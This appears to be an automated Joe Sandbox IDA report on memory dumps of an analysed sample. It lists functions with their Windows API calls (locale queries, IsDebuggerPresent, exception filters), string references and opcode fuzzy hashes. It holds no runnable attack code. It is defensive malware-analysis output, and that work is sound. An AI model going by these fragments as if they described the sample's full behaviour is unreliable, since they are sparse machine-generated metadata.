Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: b30d188ad5679ae7a7de46859f5182bdf23ef7457b45f5f285842f01f157b622
Instruction ID: c69a2cfe56159150ea44d20e3a1f1b3ded0e0e66e3b6124af0452c5759db0b80
Opcode Fuzzy Hash: b30d188ad5679ae7a7de46859f5182bdf23ef7457b45f5f285842f01f157b622
Instruction Fuzzy Hash: C2F0243640055EBBCF136F90DC09AEE7E66AF487A0F058110FA18A9130CB3AD975BB95

Function 00FF9FAA Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,00FFA1F9,00FFA1ED,00000000), ref: 00FF9FDC

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 165665a0e4c8bf8ab721a19701a0e8cc2139e4128671b5573e339de22553673b
Instruction ID: 4305d69cc6b77c1efab1beefd8b73ed05db65d8750430bfb88c35de5a6ca0158
Opcode Fuzzy Hash: 165665a0e4c8bf8ab721a19701a0e8cc2139e4128671b5573e339de22553673b
Instruction Fuzzy Hash: E4515CB290425C9ADB218B28DC80BF67BBCEF45304F2405EDE29EC7152D6759D46EF21

Non-executed Functions

Function 0103094F Relevance: 19.6, Strings: 11, Instructions: 5885COMMON

Download Yara Rule

Strings

G>q, xrefs: 01030C20
h2=?, xrefs: 01031A71
7.?j, xrefs: 01030CCE
9]`V, xrefs: 0103166E
-ms, xrefs: 0103199A
6"k~, xrefs: 010312F7
2- #, xrefs: 01031899
hw^ , xrefs: 01031229
8@[*, xrefs: 010313C4
-]45, xrefs: 01030C92
+4#, xrefs: 01031098

Memory Dump Source

Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID: +4#$-]45$-ms$2- #$6"k~$7.?j$8@[*$9]`V$G>q$h2=?$hw^
API String ID: 0-103661567
Opcode ID: 7901161aae9f9da5d229c51b76c7ce90f08aceb943cd7e8fa9e8ea12c19d518a
Instruction ID: bff9e2f65b663d48a72e304f6a610a69b022bddb9e4413f22921b4d08b5c7acb
Opcode Fuzzy Hash: 7901161aae9f9da5d229c51b76c7ce90f08aceb943cd7e8fa9e8ea12c19d518a
Instruction Fuzzy Hash: 6183217241E7D41EC7278B308AB65A17FA9FE9321031D4ACFC5C18F4B3C664991AE366

Function 00FFD39B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00FFD57F

Strings

1#INF, xrefs: 00FFD4D1
1#IND, xrefs: 00FFD4A0
1#QNAN, xrefs: 00FFD4AE
1#SNAN, xrefs: 00FFD4A7

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5d470917f00a0cb848f9fc813ec1ee89b443faeae3ce1c33dec930312e3c8b57
Instruction ID: bc467d2c187dcd2394e4652d229d8e23a8b321a6a02af1b23811719cadd93339
Opcode Fuzzy Hash: 5d470917f00a0cb848f9fc813ec1ee89b443faeae3ce1c33dec930312e3c8b57
Instruction Fuzzy Hash: ACD21772E0822C8BDB65DE28CD407EAB7B5EF44314F1441EAD54DE7260EB78AE819F41

Function 00FFC814 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00FFCB32,00000002,00000000,?,?,?,00FFCB32,?,00000000), ref: 00FFC8AD
GetLocaleInfoW.KERNEL32(?,20001004,00FFCB32,00000002,00000000,?,?,?,00FFCB32,?,00000000), ref: 00FFC8D6
GetACP.KERNEL32(?,?,00FFCB32,?,00000000), ref: 00FFC8EB

Strings

ACP, xrefs: 00FFC832
OCP, xrefs: 00FFC868

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 9d04be033b279537e95fedd7d35ab80e005805bdbea3e5fbb9cfa01a753c81d0
Instruction ID: 9b88c4ea803cd4f9322fac12db32543be0257c6a6b0788b6fae1c56dc29631eb
Opcode Fuzzy Hash: 9d04be033b279537e95fedd7d35ab80e005805bdbea3e5fbb9cfa01a753c81d0
Instruction Fuzzy Hash: 21215332E0012D9AEB35CF55CA01AB776A6BF54FB0B564424EB49D7121EB32DD40E3D0

Function 00FFC9E9 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00FFCAF5
IsValidCodePage.KERNEL32(00000000), ref: 00FFCB3E
IsValidLocale.KERNEL32(?,00000001), ref: 00FFCB4D
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00FFCB95
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00FFCBB4

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: 058c699133a6e01d0ea82ddd51bda23de008fc0cee4a28255a814792ef6a034e
Instruction ID: 833292a6dc17e19dfd3e7ad326fad88b05acc9cfca973b719be85af4d7588210
Opcode Fuzzy Hash: 058c699133a6e01d0ea82ddd51bda23de008fc0cee4a28255a814792ef6a034e
Instruction Fuzzy Hash: B1519171E0022D9FDB21DFA5CD41ABA77B8FF44710F154029E750E71A0E779A904EBA0

Function 00FFC085 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,?,?,?,?,?,00FF1848,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FFC146
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FF1848,?,?,?,00000055,?,-00000050,?,?), ref: 00FFC171
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FFC2D4

Strings

utf8, xrefs: 00FFC243

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: CodeInfoLocalePageValid
String ID: utf8
API String ID: 790303815-905460609
Opcode ID: a389c6567da4db7aea4488b6a1b8f316b68db2cc5732aa5d8c8cc45da0cff917
Instruction ID: bb05c01086b99dda2608cadb61cfe473f0b8c6bdcbc2d7f669a095834c2ffa9f
Opcode Fuzzy Hash: a389c6567da4db7aea4488b6a1b8f316b68db2cc5732aa5d8c8cc45da0cff917
Instruction Fuzzy Hash: 5C713931A0021EAAEB25BB75CD42BBB73A8EF45750F104029F745D71A1EB78E941B7E0

Function 00FF3C92 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FF3D1F

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
Instruction ID: 3c83209d2c6776ef7cbdcb46fb7d79acc5295a345023cf3368331f543b73972b
Opcode Fuzzy Hash: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
Instruction Fuzzy Hash: B5B16972E0424E9FDB158F28C881BFEBBB5EF55310F14416AEA04AB3A1D234DE05D7A1

Function 00FE7922 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00FE792E
IsDebuggerPresent.KERNEL32 ref: 00FE79FA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FE7A13
UnhandledExceptionFilter.KERNEL32(?), ref: 00FE7A1D

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c87e21c76e9cc1f20e248c9d7cbcc083946942d101fefd76cd0f50ed8e3d928f
Instruction ID: 4efeb60457796d057bbbaa3c5e3d2b00d656da3d493da51be67578589886500a
Opcode Fuzzy Hash: c87e21c76e9cc1f20e248c9d7cbcc083946942d101fefd76cd0f50ed8e3d928f
Instruction Fuzzy Hash: B7311675D063589BDB21EFA5D9497CDBBB8BF08300F1041EAE40CAB250EB759B859F44

Function 00FFC498 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FFC4EC
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FFC536
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FFC5FC

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8cfc7b15731de25ed66ca80c2e3605c3d24df688c852e1618146849af4b5bf9b
Instruction ID: 079b756c0521d4dd7b96b0e17326e0587b873523f57a63ac166f10a07167b75b
Opcode Fuzzy Hash: 8cfc7b15731de25ed66ca80c2e3605c3d24df688c852e1618146849af4b5bf9b
Instruction Fuzzy Hash: 9B61957290412F9FDB29DF24CD82B7A77A8EF04310F144179EB09C65A5E778E944EB90

Function 00FEDA73 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FEDB6B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FEDB75
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FEDB82

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 640b90c94daf0688b37684783d27a628e6f66647dc24c869ee93333563866b6b
Instruction ID: 6c7882ea03ed6b7522787c23c0fd1de339dc51e515cff49917ae6d588c95b16e
Opcode Fuzzy Hash: 640b90c94daf0688b37684783d27a628e6f66647dc24c869ee93333563866b6b
Instruction Fuzzy Hash: 7731C67490125C9BCB21DF65DC89B8DB7B8BF48350F5041DAE41CA7250E7749F859F44

Function 00FEFEF0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
Instruction ID: d369a58337703b7f7f3f138feee61193e430cb88f148cf0d18267df63e8205ed
Opcode Fuzzy Hash: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
Instruction Fuzzy Hash: 1FF15171E002199FDF14CFA9C880AADF7B1FF88324F158269E919A7391DB309E01DB94

Function 00FF572C Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FF5727,?,?,00000008,?,?,010015F5,00000000), ref: 00FF5959

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6394500a0b3f76a1173636dccfbc548f113bb9b96c9cb6e3d09892967f3da53b
Instruction ID: 537f81569780ec9c8bc2f7c32e4eceff7e04b84b1cf1947b7b611d0868872c20
Opcode Fuzzy Hash: 6394500a0b3f76a1173636dccfbc548f113bb9b96c9cb6e3d09892967f3da53b
Instruction Fuzzy Hash: A6B15F32A10A09DFD729CF28C486B647BE0FF05765F258658EA99CF2B1C335E951DB40

Function 00FE729C Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FE72B2

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: bd7901336641eb48039844463e43f34b6da1c4d1293b9ee04676cc310bd82518
Instruction ID: 367c8038ad60b4629934df304c01506daf3aa8cc43253a1fcca4113bca36d8e7
Opcode Fuzzy Hash: bd7901336641eb48039844463e43f34b6da1c4d1293b9ee04676cc310bd82518
Instruction Fuzzy Hash: 66A18DB2D053058FDB29CFA5D4927ADBBF1FB48364F18812AE449E7349C3399942CB60

Function 00FF9ABF Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9953a806d080350530143e57560c61f677e898d444d1d4dda7c2c6c26640cc97
Instruction ID: d3c4c2de186241070357cfcae142a590eee1a57b47f8b162888244e27069fe04
Opcode Fuzzy Hash: 9953a806d080350530143e57560c61f677e898d444d1d4dda7c2c6c26640cc97
Instruction Fuzzy Hash: F431F77290421DAFCB20EFB9CC89EBBB77DEF84314F144198FA1597254EA74AE409B50

Function 00FECAF2 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00FECC80

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 866df0c93b3c416d71d2a2c6273d98909f581a1bdbe93d7e00b55299fc97f577
Instruction ID: d28de0f6d0a0f56f7549ec699e26623d6ec18bd4c28b15be8dd156d963c06b59
Opcode Fuzzy Hash: 866df0c93b3c416d71d2a2c6273d98909f581a1bdbe93d7e00b55299fc97f577
Instruction Fuzzy Hash: CEC1A1709006C58FCB28CF2EC8816BABBB2BF45320F244619F45697691C735AD47EBD1

Function 00FFC6EB Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FFC73F

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 1b690ea399da0f15b30117703d61c568114ea39c62cde328d8129c47fe5db3c8
Instruction ID: a2b31bbcd70f90f9559cb3b43a457b7acf9fd6758826720806a8a05b2f542a08
Opcode Fuzzy Hash: 1b690ea399da0f15b30117703d61c568114ea39c62cde328d8129c47fe5db3c8
Instruction Fuzzy Hash: 7321B63390511EABEF28AF25DD41A7A77A8EF05710F10007AFA05D7161EB78ED00AB90

Function 00FFC372 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00FFC498,00000001,00000000,?,-00000050,?,00FFCAC9,00000000,?,?,?,00000055,?), ref: 00FFC3E4

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
